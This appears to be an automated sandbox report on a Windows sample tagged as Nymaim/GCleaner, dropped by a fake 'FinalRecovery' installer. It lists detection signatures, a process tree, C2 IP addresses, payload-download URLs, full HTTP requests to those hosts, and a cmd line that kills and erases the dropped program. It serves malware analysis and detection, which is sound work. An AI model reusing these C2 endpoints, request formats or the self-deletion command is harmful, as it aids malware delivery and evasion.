Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	791301
MD5:	14e09c7a5842688842f6c0bf61c17135
SHA1:	4c9e1cbcd933293268c396b3c79f3836665059a8
SHA256:	a5ce2c21d3f92080a06e0aa7862303848b2661181b279a2db9b72b8f31a82702
Tags:	exe
Infos:

Detection

Nymaim

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (overwrites its own PE header)

Yara detected Nymaim

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Obfuscated command line found

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

Drops PE files

Contains functionality to read the PEB

Found evasive API chain checking for process token information

Contains functionality to launch a program with higher privileges

Uses taskkill to terminate processes

Dropped file seen in connection with other malware

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to detect sandboxes (foreground window change detection)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

file.exe (PID: 5992 cmdline: C:\Users\user\Desktop\file.exe MD5: 14E09C7A5842688842F6C0BF61C17135)

file.tmp (PID: 6100 cmdline: "C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp" /SL5="$4023C,1536639,54272,C:\Users\user\Desktop\file.exe" MD5: D76329B30DB65F61D55B20F36B56DA26)

finalrecovery.exe (PID: 6076 cmdline: "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" MD5: 88A9155EB9D85157634ED38D128C877B)

6tohc1clzbcir.exe (PID: 1756 cmdline: MD5: 3FB36CB0B7172E5298D2992D42984D06)

cmd.exe (PID: 4488 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 5968 cmdline: taskkill /im "finalrecovery.exe" /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

cleanup

Malware Configuration

Threatname: Nymaim

{"C2 addresses": ["45.12.253.56", "45.12.253.72", "45.12.253.98", "45.12.253.75"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.323772698.0000000003250000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security

Unpacked PEs

Source	Rule	Description	Author
2.2.finalrecovery.exe.400000.1.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
2.2.finalrecovery.exe.3250000.2.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
2.2.finalrecovery.exe.3250000.2.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
2.2.finalrecovery.exe.400000.1.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security

Snort Signatures

ETPRO TROJAN GCleaner Downloader - Payload Response - Source IP: 45.12.253.72 - Destination IP: 192.168.2.3

Timestamp:	45.12.253.72192.168.2.380497082852925 01/25/23-10:02:04.044834
SID:	2852925
Source Port:	80
Destination Port:	49708
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\6tohc1clzbcir.exe

ReversingLabs: Detection: 60%

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Joe Sandbox ML: detected

Source: 1.2.file.tmp.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 0.3.file.exe.23675c8.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.file.tmp.4b375c.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.file.exe.218b608.5.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.file.tmp.4b375c.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.file.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen

Source: 2.2.finalrecovery.exe.400000.1.unpack

Malware Configuration Extractor: Nymaim {"C2 addresses": ["45.12.253.56", "45.12.253.72", "45.12.253.98", "45.12.253.75"]}

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0045C524 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0045C5D8 ArcFourCrypt,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0045C5F0 ArcFourCrypt,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_10001000 ISCryptGetVersion,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_10001130 ArcFourCrypt,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Unpacked PE file: 2.2.finalrecovery.exe.400000.1.unpack

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00473B80 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00451DC0 FindFirstFileA,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004963A0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00463080 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004634FC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00461AF4 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00423DAD FindFirstFileExW,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_10007E39 FindFirstFileExW,

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2852925 ETPRO TROJAN GCleaner Downloader - Payload Response 45.12.253.72:80 -> 192.168.2.3:49708

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 45.12.253.56
Source: Malware configuration extractor	IPs: 45.12.253.72
Source: Malware configuration extractor	IPs: 45.12.253.98
Source: Malware configuration extractor	IPs: 45.12.253.75

Source: Joe Sandbox View	ASN Name: CMCSUS CMCSUS
Source: Joe Sandbox View	ASN Name: CMCSUS CMCSUS

Source: Joe Sandbox View

IP Address: 45.12.253.72 45.12.253.72

Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.56
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.56
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.56
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.56
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72

Source: finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte
Source: finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.72/default/puk.php
Source: finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.72/default/puk.phpk
Source: finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.72/default/stuk.php
Source: finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.72/default/stuk.phpE
Source: finalrecovery.exe, 00000002.00000003.318212747.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.257203084.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.306066040.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.300076163.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.294050791.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.263266047.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000002.323950124.000000000426A000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000002.323964971.00000000043F5000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.312209473.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.275530934.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.281620153.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.287669574.00000000043F3000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.269177811.00000000043F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.75/dll.php
Source: finalrecovery.exe, 00000002.00000002.323950124.000000000426A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.75/dll.phpI
Source: file.tmp, 00000001.00000003.243532631.0000000002278000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://nbafrog.com/
Source: file.exe, 00000000.00000003.324832803.00000000020E1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242527892.00000000020E1000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.324490677.0000000002267000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.243532631.0000000002278000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://nbafrog.com/.
Source: file.tmp, 00000001.00000003.324143463.0000000000782000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.324394304.0000000000782000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nbafrog.com/b
Source: is-587OJ.tmp.1.dr	String found in binary or memory: http://www.finalrecovery.com/buy.htm
Source: file.tmp, file.tmp, 00000001.00000000.243074612.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-U89TP.tmp.1.dr	String found in binary or memory: http://www.innosetup.com/
Source: file.exe, 00000000.00000003.242613252.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242766712.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000000.243074612.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-U89TP.tmp.1.dr	String found in binary or memory: http://www.remobjects.com/ps
Source: file.exe, 00000000.00000003.242613252.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242766712.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.243074612.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-U89TP.tmp.1.dr	String found in binary or memory: http://www.remobjects.com/psU

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: 2_2_00401B40 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,

Source: global traffic	HTTP traffic detected: GET /advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: OKHost: 45.12.253.56Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /default/stuk.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: OKHost: 45.12.253.72Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /default/puk.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: OKHost: 45.12.253.72Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache

Source: file.exe, 00000000.00000002.324989126.0000000000638000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected Nymaim

Source: Yara match	File source: 2.2.finalrecovery.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.finalrecovery.exe.3250000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.finalrecovery.exe.3250000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.finalrecovery.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.323772698.0000000003250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00454800 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004083E4
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00466728
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0047EB9C
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0046F304
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0043D388
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004440A8
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0045E468
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0045A510
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004447A0
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004687A0
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00434900
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00430B40
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00444BAC
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00484C90
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00450D1C
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00443B00
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00485BC4
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00433BFC
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0048BECC
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0042FFB4
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00404490
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00409670
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_004056A0
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00406800
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00406AA0
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00404D40
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00405F40
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00402F20
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00415053
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00415285
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00422329
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00419490
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_004267D0
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00404840
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_004109D0
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_0042AB1A
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_0040CBC0
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00421C08
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_0042AC3A
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00428CB9
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00447D2D
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00404F20
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_1000E111
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_1000FAC0

